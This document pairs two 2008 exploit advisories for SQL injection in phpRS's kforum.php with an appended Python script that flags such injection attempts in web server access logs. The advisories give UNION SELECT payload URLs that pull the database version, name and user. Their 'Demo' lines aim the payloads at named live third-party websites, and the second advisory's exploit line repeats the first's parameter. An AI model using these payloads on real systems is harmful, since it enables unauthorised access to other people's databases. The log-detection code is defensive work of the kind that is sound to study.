[~] phpRS Version 2.8.0 (kforum.php?akce=topic&Top_ID) - SQL Injection Vulnerability
[~]
[~] http://www.supersvet.cz/phprs/
[~] ----------------------------------------------------------
[~] Bug found by d3v1l
[~]
[~] Date: 12.09.2008
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest|Gibon|Pig
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/kforum.php?akce=topic&Top_ID=-1' UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4/*
[~]
[~] Demo :-
[~]
[~] http://vsetaty-privory.eu/phprs/kforum.php?akce=topic&Top_ID=-1' UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4/*
[~]
[~] View the page source to see the result
[~]
[~]----------------------------------------------------------------------------------------------------------------------
[~] phpRS Version 2.8.1 (kforum.php?akce=kateg&Kat_ID=) - SQL Injection Vulnerability
[~]
[~] http://www.supersvet.cz/phprs/
[~] ----------------------------------------------------------
[~] Bug found by d3v1l
[~]
[~] Date: 12.09.2008
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest|Gibon|Pig
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/kforum.php?akce=topic&Top_ID=-1' UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*
[~]
[~] Demo :-
[~]
[~] http://konstruktiva.kuzelky.cz/kforum.php?akce=kateg&Kat_ID=-1' UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*
[~]
[~]
[~]
[~]----------------------------------------------------------------------------------------------------------------------
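
Added example, not part of the original advisory and not phpRS code: a log check that flags requests to kforum.php whose Top_ID or Kat_ID value is not a plain integer, which is how both injections above show up in web server logs. It assumes combined-format access logs and that legitimate IDs are non-negative integers; the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# ID parameters named in the two advisories; assumed to be plain non-negative integers.
ID_PARAMS = ("Top_ID", "Kat_ID")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
NUMERIC_RE = re.compile(r"[0-9]+")

# Constructed sample lines in combined log format (not taken from any real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Sep/2008:10:00:01 +0200] "GET /kforum.php?akce=topic&Top_ID=42 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [12/Sep/2008:10:00:05 +0200] "GET /phprs/kforum.php?akce=topic&Top_ID=-1%27%20UNION%20SELECT%201,2,3,4/* HTTP/1.1" 200 4980',
    '192.0.2.77 - - [12/Sep/2008:10:00:09 +0200] "GET /kforum.php?akce=kateg&Kat_ID=-1%27+union+select+1,2/* HTTP/1.1" 200 4710',
    '192.0.2.10 - - [12/Sep/2008:10:00:12 +0200] "GET /index.php?Top_ID=abc HTTP/1.1" 200 900',
]


def check_request(target):
    """Return [(param, decoded_value)] for non-numeric IDs sent to kforum.php."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/kforum.php"):
        return []
    # parse_qs percent-decodes values, so %27 and + appear as ' and space.
    query = parse_qs(parts.query, keep_blank_values=True)
    return [(name, value)
            for name in ID_PARAMS
            for value in query.get(name, [])
            if not NUMERIC_RE.fullmatch(value)]


def scan(lines):
    """Return [(line_number, param, decoded_value)] for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            hits.extend((number, name, value)
                        for name, value in check_request(match.group(1)))
    return hits


if __name__ == "__main__":
    for number, name, value in scan(SAMPLE_LOG):
        print(f"line {number}: {name}={value!r}")
```

The same integer-only rule, applied in the application before the value reaches the SQL query, removes the injection point rather than only detecting its use.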